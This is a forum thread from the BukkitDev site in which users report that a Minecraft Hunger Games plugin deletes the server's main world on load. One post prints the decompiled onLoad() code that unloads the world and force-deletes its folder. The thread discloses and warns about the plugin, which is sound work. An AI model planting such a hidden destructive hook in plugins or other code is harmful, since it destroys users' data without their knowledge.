Dangerous plugin was accepted, lot of comments it is dangerous and still not removed?

Discussion in 'BukkitDev Information and Feedback' started by rcth, Nov 9, 2013.

Thread Status:
Not open for further replies.
  1. Offline



    A customer of a hosting compagny I work for asked me today why his world was deleted. He was just adding a plugin. He gave me the plugin and I decompiled it and immediatly saw some dangerous code that removes the "world" mainworld.

    http://dev.bukkit.org/bukkit-plugins/hungergamesx (The dagerous code is in onLoad() in the mainclass)

    Please delete this project, as it's dangerous. I wonder how this was accepted, because it's not really hidden or something...
  2. Offline


    I can indeed confirm this, this is clearly not done by accident, as the auther forces a delete of /world:

    However this is questionable, due to HG plugins usually delete a world after restart. But never the less this should be pointed out to the user, and the word should be configurable... and a force delete is Soooooooo ugly

    Disclaimer: Decompiling code is against the copyrights of the author unless used to detect the source of an already existing problem like a deleted world.
    Cirno, rcth and Firedroide like this.
  3. Offline


    I can confirm this too:
    1. public void onLoad()
    2. {
    3. String currentDir = System.getProperty("user.dir");
    4. File deneme = new File(currentDir + "/world");
    5. getServer().unloadWorld("world", false);
    6. deleteFolder(deneme);
    7. deneme.exists();
    9. getLogger().info("Hunger Games plugini acikken reload cekmeniz hataya yol acacaktir!");
    10. }
  4. Offline


    Report the project using the little [​IMG] in the bottom right corner of the project page.

    Also, all the files seem to have this code in it
  5. Offline

    mbaxter ʇıʞʞnq ɐ sɐɥ ı

    Removed a couple offtopic posts.

    Locked. The best way to let us know about a potentially malicious plugin is to use the report functionality built into BukkitDev. We will investigate this reported potential plugin and deal with it accordingly.
    AoH_Ruthless likes this.
Thread Status:
Not open for further replies.

Share This Page